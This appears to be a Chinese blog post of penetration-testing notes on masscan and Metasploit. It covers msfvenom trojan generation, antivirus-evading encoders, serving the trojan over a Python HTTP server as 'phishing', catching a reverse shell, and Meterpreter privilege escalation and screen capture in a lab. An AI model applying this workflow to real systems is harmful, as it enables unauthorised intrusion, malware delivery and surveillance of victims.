当前位置:网站首页>内网渗透笔记——msf
内网渗透笔记——msf
2022-07-13 17:41:00 【王嘴嘴】
Masscan
号称五分钟扫遍互联网
性能优越,极限速度 1000w/s,参数 跟 nmap 差不多
-p 80,8000-8100 10.0.0.0/24
--max-rate=100000 //发包的极限速度
masscan 0.0.0.0/0 -p 0-65535 //扫描整个互联网的所有端口不要轻易尝试.......
Metasploit(msf)

一旦出现漏洞,出现利用漏洞的方法,则会马上收录——傻瓜式攻击
早期想要利用漏洞——需知道漏洞的poc和exp
poc:漏洞验证脚本(只会告诉你存在这个漏洞)
log4j:calc
exp:漏洞利用脚本(详细操作方法)
msf分为两大块
msfconsole(控制台)
msfvenom(木马生成平台,一键生成木马)
metasploit v6.1.4-dev ]
+ -- --=[ 2162 exploits - 1147 auxiliary - 367 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion
exploite:漏洞利用,配合payload
payload:成功exp后,攻击过程中执行的指令或代码,反弹shell,也可以是直接在目标系统中执行的指令
- singles:所有代码都在一个文件中(大木马),会受到内存空间的限制
- stagers:传输payload所建立的连接,安全的把我们的payload传输到目标运行(stages)
- stages:stagers建立连接后,在传输的代码(payload)
auxiliary:辅助模块,用于信息收集,没有payload的exp
encoders:编码模块,对payload进行加密,躲避杀毒的查杀
post:取得shell,进一步运行的攻击指令(后渗透)
nops:空指令,起到混淆的作用
evasion:免杀,效果非常好,但具有时限性,百分百免杀
msfdb(msf数据库,用于信息收集的存储)
msfdb init 初始化数据库
service postgresql start 启动数据库
msfdb run 自动启用连接数据库db_status 查询是否连接数据库
hosts、services 查询扫描到的数据
db_nmap == nmap(但是nmap不会存入数据库)
connect 192.168.111.131 4444 类似nc的小工具(这里是正向连接)
注意:初始化数据库,启动数据库之后,要重启控制台(exit——msfconsole)

use exploit/multi/handler 监听模块
-info
-show options 都是查看命令
常见payload连接方式
payload:
bind 正向
reverse 反向
http 80
https 443payload设置方式:
set payload 操作系统/[架构/]终端/连接方式
meterpreter 升级版shell
LHOST ——本地ip LPORT——端口
完成
run开始监听(或者exploit)
msfvenom
木马生成平台
-p 设置payload
-a 架构 x64 x86
--platform 设置平台 windows/linux
-e 编码
-i 迭代
-f 文件格式
-f raw -o 1.apk
R -o 1.apk
-o 输出文件
>
-l | --list 信息详细注意!生成的payload 要和console设置的payload大致相同
比如你监听的是windows的木马,你生成的是linux的木马,很明显不合理
lhost=本机ip
rhost=目标ip以上面设置的payload为例子,生成一个木马
好了,现在至关重要的问题来了,该怎么把木马放到受害者的靶机上呢?
最常用的方法——钓鱼
在当前文件夹快速开启http服务——搭建本地的一个网页
python2.7 -m SimpleHTTPServer 8080
python3.9 -m http.server 8080

靶机进入临时网站

注意一点,win7靶机要事先关闭防火墙,不然kali无法ping通win7
这里有奇怪的一点,输http://192.168.111.130:8080/可以访问,但是输192.168.111.130:8080无法访问,有点玄学。

kali立刻就会显示访问网页的ip地址

kali开始监听

靶机下载木马并运行

kali获得反弹shell,成功!
shell
shell ctrl_z shell放入后台
sessions 查看后台的连接
sessions -u ID shell 会话提升→meterpreter
meterpreter
meterpreter bg 返回上层
信息收集
getuid
getsidsysinfo
getsystem 一键提权,失败率较高,满试试
run vnc 直接直播
以网页的方式查看 > 直播
screenshare
常用的后渗透信息收集

边栏推荐
- 日志黑名单,真的能帮你省钱!
- Svelte 官方入门教程(4)—— 模板逻辑
- [Huang ah code] getting started with MySQL - 2. Using data definition language (DDL) to operate the database
- Automated machine learning
- Svelte 官方入门教程(2)—— 反应性
- 【黄啊码】MySQL的这些小知识点,初入门的你必须得学会
- 自动生成model(egg.js,与数据库连接来生成)
- [ASIS 2019]Unicorn shop
- [Huang ah code] fastadmin accesses wechat payment and Alipay payment
- Steps for JS parsing engine to execute JS code
猜你喜欢
随机推荐
ERR_PNPM_PEER_DEP_ISSUES Unmet peer dependencies
Handsontable Pro authorization code key generator (JS function) (for learning and communication only)
【黄啊码】微软IE浏览器将退役 网友说:以后考试报名咋办?
组件化编码流程--Todo-list案例
[Huang ah code] PHP cooperates with xlwriter to realize infinite header level excel export
[yellow code] PHP saves remote resources locally
Mobile web development
Buuctf webshell back door
模块化-CMJ&ESM
Modularity CMJ & ESM
网络安全应急响应-恶意代码分析技术
免费CDN jsdelivr 加速网站
JS根据二进制数据下载文件
Componentized coding process -- todo list case
【黄啊码】PHP配合微信公众号生成推广二维码
包管理工具
Idea automatically generates entity classes of corresponding tables in the database
【黄啊码】PHP配合xlswriter实现无限表头层级Excel导出
淘宝项目练习总结
What if there is no scroll bar on the right side of the page and you can't see the content beyond it?













![[Huang ah code] wechat applet +php realizes instant messaging chat function](/img/c4/d571f10588b7b4679105f9552bb727.png)
![[NCTF2019]Fake XML cookbook](/img/d4/e5ff896108c86179526a06911abd38.png)



